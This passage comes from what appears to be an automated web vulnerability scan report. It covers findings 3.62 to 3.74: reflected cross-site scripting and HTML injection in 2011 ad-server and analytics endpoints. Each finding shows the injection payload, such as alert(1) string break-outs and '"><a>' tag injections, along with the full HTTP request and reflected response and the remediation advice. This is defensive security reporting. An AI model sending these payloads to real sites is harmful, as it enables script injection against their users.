Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRvt=CBJBaEoSNMBpPqAI5BBe; F1FPLN=1*1303435143; PRgo=BBBAAsJvBBF-19!B; PRimp=63A10400-F398-9A14-0209-527000710100; PRca=|AJvr*1753:1|AKLp*1753:1|AJcC*23172:1|#; PRcp=|AJvrAA2R:1|AKLpAA2R:1|AJcCAGBk:1|#; PRpl=|FCbK:1|FPLN:1|Eoxl:1|#; PRcr=|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 01:29:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1247240' src='http://ads.pointroll.com/PortalServe/?pid=1247240J45720110330184804&cid=1467337&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3af0/3/0/*/v%3B2393007
...[SNIP]...
ent,ax.40%3B%3Bcmw=owl%3Bsz=160x600%3Bnet=cm%3Benv=ifr%3Bord1=82789%3Bcontx=ent%3Ban=40%3Bdc=w%3Bbtg=%3B~aopt=3/1/e5/0%3B~sscs=%3F$CTURL$&dom=http://poponthepop.com&time=3|20:25|-5&r=0.183526283130049730fb7";alert(1)//54cbf026620&flash=10&server=polRedir' width='160' height='600' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.62. http://ads.pointroll.com/PortalServe/ [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e75f"-alert(1)-"87d8d9d148c was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for every context it passes through: here it lands inside the src attribute of an iframe tag that is itself inside a double-quoted JavaScript string literal, so it needs HTML attribute encoding followed by JavaScript string-literal encoding (escaping at least the backslash, both quote characters, < and > and line terminators). Since redir is a redirect target, validating it against an allow-list of permitted destinations is the stronger fix.

Request

GET /PortalServe/?pid=1247240J45720110330184804&flash=10&time=3|20:25|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B239300729%3B0-0%3B10%3B55854524%3B2321-160/600%3B41539824/41557611/1%3Bu%3D%2Ccm-42181530_1303349054%2C11f8f328940989e%2Cent%2Cax.40%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-42181530_1303349054%2C11f8f328940989e%2Cent%2Cax.40%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D82789%3Bcontx%3Dent%3Ban%3D40%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e5/0%3B%7Esscs%3D%3f$CTURL$7e75f"-alert(1)-"87d8d9d148c&pos=x&dom=http://poponthepop.com&r=0.1835262831300497 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRvt=CBJBaEoSNMBpPqAI5BBe; F1FPLN=1*1303435143; PRgo=BBBAAsJvBBF-19!B; PRimp=63A10400-F398-9A14-0209-527000710100; PRca=|AJvr*1753:1|AKLp*1753:1|AJcC*23172:1|#; PRcp=|AJvrAA2R:1|AKLpAA2R:1|AJcCAGBk:1|#; PRpl=|FCbK:1|FPLN:1|Eoxl:1|#; PRcr=|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 01:29:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1247240' src='http://ads.pointroll.com/PortalServe/?pid=1247240J45720110330184804&cid=1467337&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3af0/3/0/*/v%3B2393007
...[SNIP]...
40%3B~okv=%3Bnet=cm%3Bu=,cm-42181530_1303349054,11f8f328940989e,ent,ax.40%3B%3Bcmw=owl%3Bsz=160x600%3Bnet=cm%3Benv=ifr%3Bord1=82789%3Bcontx=ent%3Ban=40%3Bdc=w%3Bbtg=%3B~aopt=3/1/e5/0%3B~sscs=%3F$CTURL$7e75f"-alert(1)-"87d8d9d148c&dom=http://poponthepop.com&time=3|20:25|-5&r=0.1835262831300497&flash=10&server=polRedir' width='160' height='600' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.63. http://ads.pointroll.com/PortalServe/ [time parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc9e2"%3balert(1)//15ed8fccc7d was submitted in the time parameter. This input was echoed as bc9e2";alert(1)//15ed8fccc7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Note that the server URL-decodes the parameter before echoing it (the submitted %3b arrives as ;), so the injected ; terminates the document.write statement and // comments out the remainder of the line; any encoding applied must therefore operate on the decoded value, immediately before it is written into the script.

Request

GET /PortalServe/?pid=1247240J45720110330184804&flash=10&time=3|20:25|-5bc9e2"%3balert(1)//15ed8fccc7d&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3af0/3/0/%2a/v%3B239300729%3B0-0%3B10%3B55854524%3B2321-160/600%3B41539824/41557611/1%3Bu%3D%2Ccm-42181530_1303349054%2C11f8f328940989e%2Cent%2Cax.40%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-42181530_1303349054%2C11f8f328940989e%2Cent%2Cax.40%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D82789%3Bcontx%3Dent%3Ban%3D40%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e5/0%3B%7Esscs%3D%3f$CTURL$&pos=x&dom=http://poponthepop.com&r=0.1835262831300497 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRvt=CBJBaEoSNMBpPqAI5BBe; F1FPLN=1*1303435143; PRgo=BBBAAsJvBBF-19!B; PRimp=63A10400-F398-9A14-0209-527000710100; PRca=|AJvr*1753:1|AKLp*1753:1|AJcC*23172:1|#; PRcp=|AJvrAA2R:1|AKLpAA2R:1|AJcCAGBk:1|#; PRpl=|FCbK:1|FPLN:1|Eoxl:1|#; PRcr=|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 01:29:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1247240' src='http://ads.pointroll.com/PortalServe/?pid=1247240J45720110330184804&cid=1467337&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3af0/3/0/*/v%3B2393007
...[SNIP]...
9054,11f8f328940989e,ent,ax.40%3B%3Bcmw=owl%3Bsz=160x600%3Bnet=cm%3Benv=ifr%3Bord1=82789%3Bcontx=ent%3Ban=40%3Bdc=w%3Bbtg=%3B~aopt=3/1/e5/0%3B~sscs=%3F$CTURL$&dom=http://poponthepop.com&time=3|20:25|-5bc9e2";alert(1)//15ed8fccc7d&r=0.1835262831300497&flash=10&server=polRedir' width='160' height='600' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

3.64. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a072'%3balert(1)//2d8b260247b was submitted in the admeld_adprovider_id parameter. This input was echoed as 7a072';alert(1)//2d8b260247b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the value is written into a single-quoted JavaScript string, so a bare ' is enough to break out. The parameter appears to be numeric (567 in the baseline request), so validating it as an integer before use is a simpler fix than relying on output encoding alone.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=5677a072'%3balert(1)//2d8b260247b&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d5a43de1-76cb-482d-b60c-710bb61c0a49?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349054
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 21 Apr 2011 01:29:39 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 174

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=5677a072';alert(1)//2d8b260247b&external_user_id=0&expiration=1305941379"/>');

3.65. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2817f'%3balert(1)//cf82afa1131 was submitted in the admeld_callback parameter. This input was echoed as 2817f';alert(1)//cf82afa1131 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here admeld_callback is a URL that the response embeds as an image source inside a single-quoted JavaScript string, so besides JavaScript string-literal and HTML attribute encoding it should be validated against an allow-list of expected callback hosts rather than accepted verbatim.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match2817f'%3balert(1)//cf82afa1131 HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d5a43de1-76cb-482d-b60c-710bb61c0a49?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349054
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 21 Apr 2011 01:29:44 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 174

document.write('<img width="0" height="0" src="http://tag.admeld.com/match2817f';alert(1)//cf82afa1131?admeld_adprovider_id=567&external_user_id=0&expiration=1305941384"/>');

3.66. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48256"><a>b8cff9c400d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the reflection happens in a 404 page served as text/html from a static-asset host, so a victim who follows a crafted link renders it as a normal page; the "Firm" rating reflects only the absence of a confirmed script-executing payload, not a reduced impact of the attribute break-out. The fix is the same for all of the ak.quantcast.com entries below: HTML-attribute-encode the path segments before placing them in the value attribute, or do not echo the request path into the page at all.

Request

GET /css48256"><a>b8cff9c400d/ie6.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.1.10.1298496833; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Wed, 23 Feb 2011 23:11:46 GMT
Content-Length: 7728
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css48256"><a>b8cff9c400d ie6.css" />
...[SNIP]...

3.67. http://ak.quantcast.com/css/ie6.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8485d"><a>4fb1c3ae11e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie6.css8485d"><a>4fb1c3ae11e HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.1.10.1298496833; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Wed, 23 Feb 2011 23:12:20 GMT
Content-Length: 7728
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css ie6.css8485d"><a>4fb1c3ae11e" />
...[SNIP]...

3.68. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62631"><a>0818aa67453 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css62631"><a>0818aa67453/ie7.css?v=2011022307 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.1.10.1298496833; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Wed, 23 Feb 2011 23:11:47 GMT
Content-Length: 7728
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css62631"><a>0818aa67453 ie7.css" />
...[SNIP]...

3.69. http://ak.quantcast.com/css/ie7.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /css/ie7.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd709"><a>6e1ecdc6d7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /css/ie7.cssfd709"><a>6e1ecdc6d7c?v=2011022307 HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.1.10.1298496833; __qca=P0-1138661367-1297862290557;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Wed, 23 Feb 2011 23:12:23 GMT
Content-Length: 7728
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" css ie7.cssfd709"><a>6e1ecdc6d7c" />
...[SNIP]...

3.70. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96fc2"><a>418e99f22e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css96fc2"><a>418e99f22e1/screen-optimized.css?v=2011022307 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1138661367-1297862290557; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1297862294.1298206755.2

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 21:46:09 GMT
Connection: close
Content-Length: 7788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css96fc2"><a>418e99f22e1 screen-optimized.css" />
...[SNIP]...

3.71. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40a8"><a>dca22fd21f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css/screen-optimized.csse40a8"><a>dca22fd21f3?v=2011022307 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1138661367-1297862290557; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1297862294.1298206755.2

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 21:46:45 GMT
Connection: close
Content-Length: 7791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css screen-optimized.csse40a8"><a>dca22fd21f3" />
...[SNIP]...

3.72. http://ak.quantcast.com/images/sprite.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /images/sprite.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9904"><a>6e51fd54aca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imagesa9904"><a>6e51fd54aca/sprite.png?v=20110222 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1138661367-1297862290557; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.1.10.1298496833

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 21:46:10 GMT
Connection: close
Content-Length: 7746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" imagesa9904"><a>6e51fd54aca sprite.png" />
...[SNIP]...

3.73. http://ak.quantcast.com/images/sprite.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /images/sprite.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc0e4"><a>81bf2eedf52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/sprite.pngcc0e4"><a>81bf2eedf52?v=20110222 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1138661367-1297862290557; __utmz=14861494.1297862294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=14861494.1792645891.1297862294.1298206755.1298496833.3; __utmc=14861494; __utmb=14861494.1.10.1298496833

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Wed, 23 Feb 2011 21:46:47 GMT
Connection: close
Content-Length: 7746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" images sprite.pngcc0e4"><a>81bf2eedf52" />
...[SNIP]...

3.74. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

